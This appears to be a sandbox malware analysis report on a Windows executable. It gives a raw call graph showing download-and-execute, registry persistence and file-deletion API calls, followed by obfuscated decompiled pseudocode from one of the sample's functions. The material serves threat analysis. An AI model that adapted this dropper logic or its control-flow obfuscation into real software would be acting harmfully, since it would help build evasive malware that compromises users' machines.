calls 33943->34059 33947 41c67f 33944->33947 33948 41c62f __locking 33945->33948 33995 423ed7 HeapCreate 33947->33995 33950 41c6c0 33951 41c6cc 33950->33951 34060 41c585 68 API calls 2 library calls 33950->34060 34061 420385 79 API calls 5 library calls 33951->34061 33954 41c6d2 33955 41c6d6 33954->33955 33956 41c6de __RTC_Initialize 33954->33956 34062 41c585 68 API calls 2 library calls 33955->34062 34005 42550f 73 API calls 3 library calls 33956->34005 33958 41c6dd 33958->33956 33960 41c6eb 33961 41c6f7 GetCommandLineA 33960->33961 33962 41c6ef 33960->33962 34006 4253da 77 API calls 2 library calls 33961->34006 34063 420f77 68 API calls 2 library calls 33962->34063 33965 41c6f6 33965->33961 33966 41c707 34064 425321 113 API calls 3 library calls 33966->34064 33968 41c711 33969 41c715 33968->33969 33970 41c71d 33968->33970 34065 420f77 68 API calls 2 library calls 33969->34065 34007 4250ae 112 API calls 6 library calls 33970->34007 33973 41c71c 33973->33970 33974 41c722 33975 41c726 33974->33975 33976 41c72e 33974->33976 34066 420f77 68 API calls 2 library calls 33975->34066 34008 421093 75 API calls 4 library calls 33976->34008 33979 41c72d 33979->33976 33980 41c734 33981 41c740 33980->33981 33982 41c739 33980->33982 34009 425051 112 API calls 2 library calls 33981->34009 34067 420f77 68 API calls 2 library calls 33982->34067 33985 41c745 33987 41c74a 33985->33987 34010 418860 CreateMutexW GetLastError 33985->34010 33986 41c73f 33986->33981 33987->33985 33990 41c770 34069 421229 68 API calls _abort 33990->34069 33993 41c775 33993->33948 33994->33941 33996 423ef7 33995->33996 33997 423efa 33995->33997 33996->33950 34070 423e7c 68 API calls 3 library calls 33997->34070 33999 423eff 34000 423f09 33999->34000 34001 423f2d 33999->34001 34071 4240d8 HeapAlloc 34000->34071 34001->33950 34003 423f13 34003->34001 34004 423f18 HeapDestroy 34003->34004 34004->33996 34005->33960 34006->33966 34007->33974 34008->33980 34009->33985 34011 4188a5 34010->34011 34016 4188d9 34010->34016 34012 4188c4 34011->34012 34013 4188ae SetForegroundWindow ShowWindow 34011->34013 34014 4188c8 CloseHandle 34012->34014 34015 4188cf 34012->34015 34013->34012 34014->34015 34088 41b3f9 5 API calls __invoke_watson 34015->34088 34072 418d40 RegCloseKey ___init_ctype 34016->34072 34018 418b79 34018->33990 34068 421207 68 API calls _abort 34018->34068 34020 41890b 34073 401d80 76 API calls 2 library calls 34020->34073 34022 41894a 34074 402890 76 API calls 34022->34074 34024 41897b 34075 402890 76 API calls 34024->34075 34026 418991 34076 402890 76 API calls 34026->34076 34028 4189a7 34077 402890 76 API calls 34028->34077 34030 4189bd 34078 404510 76 API calls __cinit 34030->34078 34032 4189d7 34033 4189e1 34032->34033 34034 4189e9 InitCommonControlsEx CoInitializeEx 34032->34034 34079 418450 123 API calls ___init_ctype 34033->34079 34037 418a89 34034->34037 34038 418a2d 34034->34038 34081 41ad5c 76 API calls 6 library calls 34037->34081 34080 404510 76 API calls __cinit 34038->34080 34042 418a32 34049 418a66 34042->34049 34043 418a90 34082 402550 169 API calls std::locale::facet::facet_Register 34043->34082 34044 418b5e CloseHandle 34044->34015 34045 418aab 34046 418ad2 34045->34046 34047 418aaf 34045->34047 34084 4127e0 77 API calls 34046->34084 34083 404510 76 API calls __cinit 34047->34083 34049->34015 34049->34042 34049->34044 34051 418ae6 34085 404510 76 API calls __cinit 34051->34085 34053 418aeb 34054 418b06 CoUninitialize 34053->34054 34055 418af6 34053->34055 34087 40fda0 8 API calls 34054->34087 34086 401bf0 71 API calls _memmove_s 34055->34086 34058 418afd 34058->34054 34059->33948 34060->33951 34061->33954 34062->33958 34063->33965 34064->33968 34065->33973 34066->33979 34067->33986 34068->33990 34069->33993 34070->33999 34071->34003 34072->34020 34073->34022 34074->34024 34075->34026 34076->34028 34077->34030 34078->34032 34079->34034 34080->34042 34081->34043 34082->34045 34083->34042 34084->34051 34085->34053 34086->34058 34087->34049 34088->34018 34089 96fefa 34090 96ff06 __FrameHandler3::FrameUnwindToState 34089->34090 34115 9701a5 34090->34115 34092 96ff0d 34093 970060 34092->34093 34100 96ff37 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 34092->34100 34146 970476 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 34093->34146 34095 970067 34096 97006d 34095->34096 34139 971bec 34095->34139 34147 971c02 23 API calls CallUnexpected 34096->34147 34099 970075 34101 96ff56 34100->34101 34102 96ffd7 34100->34102 34142 971c36 37 API calls 4 library calls 34100->34142 34123 9703f2 GetStartupInfoW CallUnexpected 34102->34123 34104 96ffdd 34124 952e20 34104->34124 34109 96fff9 34109->34095 34110 96fffd 34109->34110 34111 970006 34110->34111 34144 971c18 23 API calls CallUnexpected 34110->34144 34145 9701de 73 API calls ___scrt_uninitialize_crt 34111->34145 34114 97000e 34114->34101 34116 9701ae 34115->34116 34148 970685 IsProcessorFeaturePresent 34116->34148 34118 9701ba 34149 970efe 10 API calls 2 library calls 34118->34149 34120 9701bf 34122 9701c3 34120->34122 34150 970f1d 7 API calls 2 library calls 34120->34150 34122->34092 34123->34104 34151 951000 GetModuleHandleW 34124->34151 34126 952e40 34127 952ebc 34126->34127 34128 952e90 34126->34128 34131 952eaf 34126->34131 34159 951ae0 34127->34159 34128->34126 34211 952c00 9 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 34128->34211 34212 952d50 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 34131->34212 34135 952eb4 ExitProcess 34138 952ee9 34143 970423 GetModuleHandleW 34138->34143 34438 971d56 34139->34438 34142->34102 34143->34109 34144->34111 34145->34114 34146->34095 34147->34099 34148->34118 34149->34120 34150->34122 34158 951047 CatchIt CallUnexpected 34151->34158 34152 95138c 34155 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34152->34155 34153 951107 lstrcmpA 34153->34158 34154 972cb7 15 API calls ___std_exception_copy 34154->34158 34156 951827 34155->34156 34156->34126 34157 952b40 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34157->34158 34158->34152 34158->34153 34158->34154 34158->34157 34220 96fba0 34159->34220 34162 951f50 wsprintfW wsprintfW 34169 952750 14 API calls 34162->34169 34164 951be0 wsprintfW 34178 952750 14 API calls 34164->34178 34165 951b3b wsprintfW wsprintfW 34238 952750 InternetOpenW 34165->34238 34166 952300 lstrcpyW 34187 951b36 CallUnexpected 34166->34187 34168 951c9a 34180 951840 13 API calls 34168->34180 34176 951fb4 lstrcmpW 34169->34176 34170 951d33 SetFileAttributesW lstrlenW lstrcmpW 34170->34187 34172 9522fb 34185 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34172->34185 34176->34187 34178->34187 34179 9520b8 DeleteFileW 34179->34187 34184 951caa ShellExecuteW 34180->34184 34181 952280 lstrcpyW 34181->34187 34183 96f420 24 API calls 34186 952125 wsprintfW 34183->34186 34184->34187 34189 95245a 34185->34189 34257 96f870 34186->34257 34187->34162 34187->34164 34187->34165 34187->34166 34187->34168 34187->34170 34187->34172 34187->34179 34187->34181 34187->34183 34190 972cd4 37 API calls 34187->34190 34222 972c33 GetSystemTimeAsFileTime 34187->34222 34224 972cc2 34187->34224 34227 972cd4 34187->34227 34230 951840 34187->34230 34251 96f420 34187->34251 34260 96f400 34187->34260 34194 952470 GetTempPathW 34189->34194 34190->34187 34203 9524c3 34194->34203 34195 96f420 24 API calls 34197 952615 wsprintfW 34195->34197 34196 9525e8 DeleteFileW 34196->34203 34201 96f870 36 API calls 34197->34201 34198 972cc2 37 API calls 34198->34203 34199 96f400 32 API calls 34199->34203 34200 96f420 24 API calls 34200->34203 34205 952641 ShellExecuteW 34201->34205 34202 9525a8 34207 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34202->34207 34203->34195 34203->34196 34203->34198 34203->34199 34203->34200 34203->34202 34206 972cd4 37 API calls 34203->34206 34436 96f890 20 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 34203->34436 34205->34203 34208 952690 wsprintfW 34206->34208 34209 952738 34207->34209 34210 952750 14 API calls 34208->34210 34213 96fb8d 34209->34213 34210->34203 34211->34128 34212->34135 34214 96fb96 IsProcessorFeaturePresent 34213->34214 34215 96fb95 34213->34215 34217 96fcf7 34214->34217 34215->34138 34437 96fddc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34217->34437 34219 96fdda 34219->34138 34221 951aee SHGetSpecialFolderPathW 34220->34221 34221->34187 34223 972c65 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 34222->34223 34223->34187 34263 97485f GetLastError 34224->34263 34228 97485f _unexpected 37 API calls 34227->34228 34229 951eb8 wsprintfW CreateDirectoryW 34228->34229 34229->34187 34231 951882 34230->34231 34232 951887 wsprintfW wsprintfW ShellExecuteW 34231->34232 34233 9519f0 RegOpenKeyW lstrlenW RegSetValueExW RegCloseKey 34231->34233 34234 951996 GetSystemDirectoryW 34231->34234 34235 9518f7 34231->34235 34232->34231 34233->34231 34234->34231 34236 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34235->34236 34237 951ad2 ShellExecuteW 34236->34237 34237->34187 34242 95278c 34238->34242 34239 9529d1 InternetReadFile WriteFile 34239->34242 34240 952acb CloseHandle 34240->34242 34247 952880 34240->34247 34241 952a18 InternetCloseHandle 34241->34242 34242->34239 34242->34240 34242->34241 34243 9528b4 CreateFileW 34242->34243 34244 9527e4 InternetOpenUrlW 34242->34244 34245 952791 InternetCloseHandle 34242->34245 34246 9529cc 34242->34246 34242->34247 34248 952850 CreateFileW 34242->34248 34243->34242 34244->34242 34245->34242 34249 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34246->34249 34247->34240 34247->34242 34248->34242 34248->34247 34250 951b82 lstrcmpW 34249->34250 34250->34187 34252 96f465 34251->34252 34253 96f4fc 34252->34253 34306 96b050 24 API calls 2 library calls 34252->34306 34255 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34253->34255 34256 96f637 34255->34256 34256->34187 34307 96f650 34257->34307 34333 96ef20 34260->34333 34262 96f411 34262->34187 34264 974876 34263->34264 34265 97487c 34263->34265 34298 974446 6 API calls _free 34264->34298 34289 974882 SetLastError 34265->34289 34290 974485 6 API calls _free 34265->34290 34268 97489a 34268->34289 34291 97651e 34268->34291 34272 9748b2 34299 974485 6 API calls _free 34272->34299 34273 9748c9 34300 974485 6 API calls _free 34273->34300 34274 974916 34303 9730d2 37 API calls CallUnexpected 34274->34303 34275 972ccc 34275->34187 34279 9748d5 34282 9748ea 34279->34282 34283 9748d9 34279->34283 34280 9748c0 34286 975822 _free 14 API calls 34280->34286 34302 974ad7 14 API calls _free 34282->34302 34301 974485 6 API calls _free 34283->34301 34286->34289 34287 9748f5 34288 975822 _free 14 API calls 34287->34288 34288->34289 34289->34274 34289->34275 34290->34268 34296 97652b _free 34291->34296 34292 97656b 34305 976492 14 API calls _free 34292->34305 34293 976556 RtlAllocateHeap 34294 9748aa 34293->34294 34293->34296 34294->34272 34294->34273 34296->34292 34296->34293 34304 971ee1 EnterCriticalSection LeaveCriticalSection _free 34296->34304 34298->34265 34299->34280 34300->34279 34301->34280 34302->34287 34304->34296 34305->34294 34306->34252 34308 96f67b 34307->34308 34310 96f6e6 34308->34310 34313 96d030 34308->34313 34311 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34310->34311 34312 95216a lstrcmpW 34311->34312 34312->34187 34325 96d0d0 34313->34325 34314 96eeed 34315 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34314->34315 34319 96ef07 34315->34319 34316 96db7f SetFileTime 34316->34325 34317 96ee01 CreateFileW 34317->34325 34318 96dc71 wsprintfW 34318->34325 34319->34308 34320 96d735 CloseHandle 34320->34325 34321 96e5d4 wsprintfW 34321->34325 34322 96d888 WriteFile 34322->34325 34323 96e3dd 34323->34308 34324 9675c0 7 API calls 34324->34325 34325->34314 34325->34316 34325->34317 34325->34318 34325->34320 34325->34321 34325->34322 34325->34323 34325->34324 34326 968a10 22 API calls 34325->34326 34328 965990 19 API calls 34325->34328 34329 969270 7 API calls 34325->34329 34330 965370 7 API calls 34325->34330 34331 96c8f0 10 API calls 34325->34331 34332 96b050 24 API calls 2 library calls 34325->34332 34326->34325 34328->34325 34329->34325 34330->34325 34331->34325 34332->34325 34343 96fb4a 34333->34343 34337 96f04d 34340 96fb4a 21 API calls 34337->34340 34338 96f039 34367 96f0a0 34338->34367 34341 96f040 34340->34341 34341->34262 34342 96ef5f _strlen 34357 96a970 34342->34357 34347 96fb4f 34343->34347 34345 96fb69 34345->34342 34347->34345 34349 96fb6b 34347->34349 34371 972cb7 34347->34371 34378 971ee1 EnterCriticalSection LeaveCriticalSection _free 34347->34378 34348 96fcc4 34380 970865 RaiseException 34348->34380 34349->34348 34379 970865 RaiseException 34349->34379 34352 96fce1 IsProcessorFeaturePresent 34354 96fcf7 34352->34354 34381 96fddc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34354->34381 34356 96fdda 34356->34342 34360 96a9d4 34357->34360 34358 96ad96 34365 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34358->34365 34359 96ac02 SetFilePointer 34359->34360 34362 96ac1f 34359->34362 34360->34358 34360->34359 34361 96aef1 GetCurrentDirectoryW 34360->34361 34384 962b00 34360->34384 34393 9649f0 34360->34393 34361->34360 34362->34360 34366 96b037 34365->34366 34366->34337 34366->34338 34368 96f0d7 34367->34368 34369 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34368->34369 34370 96f3ea 34369->34370 34370->34341 34376 97657b _free 34371->34376 34372 9765b9 34383 976492 14 API calls _free 34372->34383 34373 9765a4 RtlAllocateHeap 34375 9765b7 34373->34375 34373->34376 34375->34347 34376->34372 34376->34373 34382 971ee1 EnterCriticalSection LeaveCriticalSection _free 34376->34382 34378->34347 34379->34348 34380->34352 34381->34356 34382->34376 34383->34375 34388 962b3c 34384->34388 34385 962cda CreateFileW 34385->34388 34386 962cbf SetFilePointer 34386->34388 34387 962be1 SetFilePointer 34387->34388 34388->34385 34388->34386 34388->34387 34389 96fb4a 21 API calls 34388->34389 34390 962e35 34388->34390 34389->34388 34391 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34390->34391 34392 962f4c 34391->34392 34392->34360 34402 964a40 34393->34402 34394 96534f 34398 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34394->34398 34395 972cb7 ___std_exception_copy 15 API calls 34395->34402 34397 963e90 6 API calls 34397->34402 34400 96535d 34398->34400 34400->34360 34402->34394 34402->34395 34402->34397 34403 965261 CloseHandle 34402->34403 34404 964100 34402->34404 34415 9631c0 34402->34415 34421 965370 7 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 34402->34421 34403->34402 34405 9631c0 6 API calls 34404->34405 34410 964123 34405->34410 34406 9649ca 34407 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34406->34407 34408 9649d5 34407->34408 34408->34402 34410->34406 34411 972c9c ___std_exception_destroy 14 API calls 34410->34411 34412 972cb7 ___std_exception_copy 15 API calls 34410->34412 34413 9631c0 6 API calls 34410->34413 34422 962f60 34410->34422 34430 963570 34410->34430 34411->34410 34412->34410 34413->34410 34416 963256 34415->34416 34417 9634d8 SetFilePointer 34416->34417 34418 963450 34416->34418 34417->34416 34419 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34418->34419 34420 96355b 34419->34420 34420->34402 34421->34402 34423 962f8d 34422->34423 34424 9630a0 SetFilePointer 34423->34424 34425 962f8f SetFilePointer 34423->34425 34426 9631a5 34423->34426 34427 963028 34423->34427 34424->34423 34425->34423 34426->34410 34428 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34427->34428 34429 9631b5 34428->34429 34429->34410 34432 9635ac CatchIt 34430->34432 34431 96380d ReadFile 34431->34432 34432->34431 34433 9636e1 34432->34433 34434 96fb8d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34433->34434 34435 96387f 34434->34435 34435->34410 34436->34203 34437->34219 34439 971d76 34438->34439 34440 971d64 34438->34440 34450 971e94 34439->34450 34466 971c6b GetModuleHandleW 34440->34466 34444 971d69 34444->34439 34467 971cae GetModuleHandleExW 34444->34467 34445 971bfd 34445->34096 34449 971db9 34451 971ea0 __FrameHandler3::FrameUnwindToState 34450->34451 34473 9747d0 EnterCriticalSection 34451->34473 34453 971eaa 34474 971dba 34453->34474 34455 971eb7 34478 971ed5 34455->34478 34458 971d01 34483 9761ba GetPEB 34458->34483 34461 971d30 34464 971cae CallUnexpected 3 API calls 34461->34464 34462 971d10 GetPEB 34462->34461 34463 971d20 GetCurrentProcess TerminateProcess 34462->34463 34463->34461 34465 971d38 ExitProcess 34464->34465 34466->34444 34468 971cf0 34467->34468 34469 971ccd GetProcAddress 34467->34469 34471 971cf6 FreeLibrary 34468->34471 34472 971cff 34468->34472 34470 971ce2 34469->34470 34470->34468 34471->34472 34472->34439 34473->34453 34475 971dc6 __FrameHandler3::FrameUnwindToState 34474->34475 34477 971e27 CallUnexpected 34475->34477 34481 972475 14 API calls CallUnexpected 34475->34481 34477->34455 34482 9747e7 LeaveCriticalSection 34478->34482 34480 971da9 34480->34445 34480->34458 34481->34477 34482->34480 34484 9761d4 34483->34484 34485 971d0b 34483->34485 34487 9745a0 5 API calls _free 34484->34487 34485->34461 34485->34462 34487->34485 34488 96fee8 34493 97046a SetUnhandledExceptionFilter 34488->34493 34490 96feed 34494 972c04 25 API calls 2 library calls 34490->34494 34492 96fef8 34493->34490 34494->34492

                                                                                                                              Executed Functions

                                                                                                                              Function 00951000 Relevance: 26.8, APIs: 2, Strings: 13, Instructions: 517stringCOMMONCrypto
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 130 951000-951045 GetModuleHandleW 131 951067-95106c 130->131 132 951047 130->132 134 951140-951145 131->134 135 951072-951077 131->135 133 9510d0-9510d5 132->133 136 9511c0-9511c5 133->136 137 9510db-9510e0 133->137 138 9512f8-9512fd 134->138 139 95114b-951150 134->139 140 951273-951278 135->140 141 95107d-951082 135->141 142 95133b-951340 136->142 143 9511cb-9511d0 136->143 144 9510e6-9510eb 137->144 145 9512b1-9512b6 137->145 146 951303-951308 138->146 147 95165e-951670 138->147 148 951156-95115b 139->148 149 951458-95149c 139->149 150 95127e-951283 140->150 151 9515b8-9515c6 140->151 152 951376-95137b 141->152 153 951088-95108d 141->153 168 951346-95134b 142->168 169 95167b-9517c1 call 972cb7 call 9710e0 call 952b40 call 972cb7 call 971660 call 9710e0 142->169 158 9511d6-9511db 143->158 159 95156d-951591 143->159 163 9513a6-9513f6 144->163 164 9510f1-9510f6 144->164 160 9512bc-9512c1 145->160 161 9515e9-951632 145->161 165 95104c-95105f 146->165 166 95130e-951313 146->166 147->131 162 951676 147->162 171 9514a7-951562 call 972cb7 call 9710e0 call 952b40 call 972cb7 call 9710e0 148->171 172 951161-951166 148->172 149->131 167 9514a2 149->167 173 9515d1-9515e4 150->173 174 951289-95128e 150->174 151->131 170 9515cc 151->170 154 951381-951386 152->154 155 9517f2-951811 152->155 156 951391-95139b 153->156 157 951093-951098 153->157 175 951060-951065 154->175 176 95138c-951833 call 96fb8d 154->176 155->131 187 951817 155->187 156->131 179 9513a1 156->179 157->175 184 95109a-9510c5 157->184 177 9511e1-9511e6 158->177 178 95159c-9515ad 158->178 159->131 188 951597 159->188 185 9512c7-9512cc 160->185 186 95163d-951653 160->186 161->131 196 951638 161->196 162->169 163->131 180 9513fc 163->180 189 951401-95144d 164->189 190 9510fc-951101 164->190 165->175 166->175 191 951319-951330 166->191 167->133 192 951351-951356 168->192 193 9517cc-9517da 168->193 169->131 242 9517c7 169->242 170->133 171->131 240 951568 171->240 172->175 194 95116c-9511b5 172->194 195 9517df-9517e7 173->195 174->175 183 951294-9512a6 174->183 175->131 175->133 177->175 199 9511ec-951268 call 972cb7 call 971660 call 9710e0 177->199 178->131 208 9515b3 178->208 179->133 180->133 183->131 203 9512ac 183->203 184->131 204 9510c7 184->204 185->175 205 9512d2-9512ed 185->205 186->131 197 951659 186->197 187->133 188->133 189->131 201 951453 189->201 190->175 207 951107-951134 lstrcmpA 190->207 191->131 209 951336 191->209 192->175 210 95135c-95136b 192->210 193->195 194->131 211 9511bb 194->211 195->131 206 9517ed 195->206 196->133 197->133 199->131 234 95126e 199->234 201->133 203->133 204->133 205->131 215 9512f3 205->215 206->133 207->195 208->133 209->133 210->131 217 951371 210->217 211->133 215->133 217->133 234->133 240->133 242->133
                                                                                                                              C-Code - Quality: 32%
                                                                                                                              			E00951000(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t166;
				struct HINSTANCE__* _t168;
				signed int _t174;
				CHAR* _t177;
				intOrPtr _t178;
				signed int _t197;
				signed int _t198;
				signed int _t205;
				signed char* _t215;
				signed int _t221;
				signed int _t244;
				signed char* _t250;
				signed int _t258;
				intOrPtr _t260;
				signed int _t263;
				signed int _t274;
				signed int _t280;
				void* _t287;
				signed int _t316;
				signed int _t318;
				intOrPtr _t320;
				signed int _t322;
				signed int _t325;
				void* _t359;
				signed int _t364;
				signed int _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t372;
				void* _t373;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;

				_t166 =  *0x984000; // 0xd51acdcc
				 *(_t367 + 0x58) = _t166 ^ _t367;
				_t168 = GetModuleHandleW(0);
				 *(_t367 + 0xc) = _t168;
				 *((intOrPtr*)(_t367 + 0x10)) =  *((intOrPtr*)(_t168 + 0x3c)) +  *(_t367 + 0xc);
				 *((intOrPtr*)(_t367 + 0x14)) =  *((intOrPtr*)(_t367 + 0x10));
				 *((intOrPtr*)(_t367 + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x14))));
				_t174 = 0xeb625272;
				if(0xeb625272 <= 0xfed62cf2) {
					L11:
					while(_t174 > 0xaa12fd1d) {
						if(_t174 > 0xe33d737a) {
							if(_t174 == 0xe33d737b) {
								 *(_t367 + 0x28) = _t367 + 0x44;
								_t177 =  *(_t367 + 0x28);
								_t177[0xf] = 0x8a00b7b7;
								_t177[0xc] = 0xb7781caf;
								_t177[8] = 0x5899deb1;
								_t177[4] = 0x7d69c289;
								 *_t177 = 0x3d9ca10;
								_push( *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x24)) + 0x10)));
								_t178 = E00972CB7();
								_t368 = _t367 + 4;
								 *((intOrPtr*)(_t368 + 0x2c)) = _t178;
								E009710E0( *((intOrPtr*)(_t368 + 0x34)),  *((intOrPtr*)( *((intOrPtr*)(_t368 + 0x24)) + 0xc)) +  *((intOrPtr*)(_t368 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x24)) + 0x10)));
								_t369 = _t368 + 0xc;
								E00952B40( *((intOrPtr*)(_t369 + 0x38)),  *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x24)) + 0x10)), _t367 + 0x44, 0x13);
								_t370 = _t369 + 0x10;
								_t274 =  *(_t370 + 0x70);
								 *_t274 =  *( *(_t370 + 0x2c)) & 0x000000ff;
								_t280 = (( *(_t370 + 0x2c))[2] & 0x000000ff) << 8;
								_t325 =  !_t280 & 0xcb6f0f24;
								 *(_t370 + 0x30) = (( *(_t370 + 0x2c))[1] & 0xdb |  !(( *(_t370 + 0x2c))[1] & 0x000000ff) & 0xcb6f0f24) ^ (_t280 & 0x0000f000 | _t325);
								_push( *(_t370 + 0x30) + 2);
								 *((intOrPtr*)(_t274 + 4)) = E00972CB7();
								E00971660( *(_t370 + 0x30) + 2, _t191, 0,  *(_t370 + 0x30) + 2);
								_t372 = _t370 + 0x10;
								E009710E0(_t191,  *((intOrPtr*)(_t372 + 0x2c)) + 3,  *((intOrPtr*)(_t372 + 0x30)));
								_t367 = _t372 + 0xc;
								_t197 =  *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 3) & 0x000000ff;
								 *(_t274 + 8) = _t197;
								_t198 =  *0x984918; // 0x0
								 *((char*)(_t367 + 0x35)) = _t197 != 0;
								_t154 = _t198 - 1; // -1
								_t202 =  ==  ? 0x319cc50d : 0x84c325e;
								_t203 =  >=  ? 0x84c325e :  ==  ? 0x319cc50d : 0x84c325e;
								_t322 = (_t325 & 0xffffff00 |  *0x98491c - 0x0000000a < 0x00000000) ^ (_t154 * _t198 & 0xffffff00 | ((_t154 * _t198 ^ 0xfffffffe) & _t154 * _t198) == 0x00000000);
								_t174 =  !=  ? 0x319cc50d :  >=  ? 0x84c325e :  ==  ? 0x319cc50d : 0x84c325e;
								if(0x84c325e > 0xfed62cf2) {
									goto L4;
								} else {
									continue;
								}
								goto L82;
							} else {
								if(_t174 == 0xeb625272) {
									_t287 = 0x7feac9c0;
									_t205 = 0x7eca333a;
									goto L78;
								} else {
									if(_t174 != 0xf6bb53e2) {
										goto L3;
									} else {
										_t174 = 0xaa12fd1e;
										_t364 = 1 +  *(_t367 + 0x38);
										if(0xaa12fd1e > 0xfed62cf2) {
											goto L4;
										} else {
											continue;
										}
									}
								}
							}
						} else {
							if(_t174 == 0xaa12fd1e) {
								 *(_t367 + 0x38) = _t364;
								_t322 = 0x99f22e0b;
								_t174 =  <  ? 0x99f22e0b : 0xab087e49;
								if(0xab087e49 > 0xfed62cf2) {
									goto L4;
								} else {
									continue;
								}
								goto L82;
							} else {
								if(_t174 == 0xab087e49) {
									_t174 = 0x8c38113;
									 *_t367 = 2;
									if(0x8c38113 > 0xfed62cf2) {
										goto L4;
									} else {
										continue;
									}
									goto L82;
								} else {
									if(_t174 != 0xc7bdfb42) {
										L3:
										if(_t174 <= 0xfed62cf2) {
											continue;
										}
										goto L4;
									} else {
										_t274 = _t364;
										_t212 = ( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 5) & 0x000000ff) << 8;
										_t347 = ( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 4) & 0x000000ff | 0xc2e21100) ^ (( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 5) & 0x000000ff) << 0x00000008 & 0x0000ee00 |  !_t212 & 0xc2e21100);
										_push((( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 4) & 0x000000ff | 0xc2e21100) ^ (( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 5) & 0x000000ff) << 0x00000008 & 0x0000ee00 |  !_t212 & 0xc2e21100)) + 2);
										_t215 = E00972CB7();
										_t373 = _t367 + 4;
										_t361 = _t215;
										 *( *((intOrPtr*)(_t373 + 0x70)) + 0xc) = _t215;
										_t364 = _t274;
										E00971660(( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 4) & 0x000000ff | 0xc2e21100) ^ (( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 5) & 0x000000ff) << 0x00000008 & 0x0000ee00 |  !_t212 & 0xc2e21100), _t215, 0, (( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 4) & 0x000000ff | 0xc2e21100) ^ (( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 5) & 0x000000ff) << 0x00000008 & 0x0000ee00 |  !_t212 & 0xc2e21100)) + 2);
										_t374 = _t373 + 0xc;
										E009710E0(_t215,  *((intOrPtr*)(_t374 + 0x30)) +  *((intOrPtr*)(_t374 + 0x2c)) + 6, ( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 4) & 0x000000ff | 0xc2e21100) ^ (( *( *((intOrPtr*)(_t367 + 0x30)) +  *((intOrPtr*)(_t367 + 0x2c)) + 5) & 0x000000ff) << 0x00000008 & 0x0000ee00 |  !_t212 & 0xc2e21100));
										_t367 = _t374 + 0xc;
										_t174 = 0xa58778e5;
										if(0xa58778e5 > 0xfed62cf2) {
											L4:
											while(_t174 > 0x33134b10) {
												if(_t174 <= 0x6c45805d) {
													if(_t174 == 0x33134b11) {
														_t174 = 0x8278cfc9;
														if(0x8278cfc9 > 0xfed62cf2) {
															continue;
														} else {
															goto L11;
														}
														goto L82;
													} else {
														if(_t174 == 0x4cfc89e6) {
															_t322 =  *(_t367 + 4);
															_t205 = 0x8c38113;
															_t287 = 0xf6bb53e2;
															 *_t367 = _t322;
															L78:
															_t174 =  ==  ? _t287 : _t205;
															if(_t174 > 0xfed62cf2) {
																continue;
															} else {
																goto L11;
															}
															L82:
															E0096FB8D(_t174, _t274,  *(_t367 + 0x58) ^ _t367, _t322, _t347, _t361);
															return 1;
														} else {
															if(_t174 != 0x59fb82a3) {
																goto L3;
															} else {
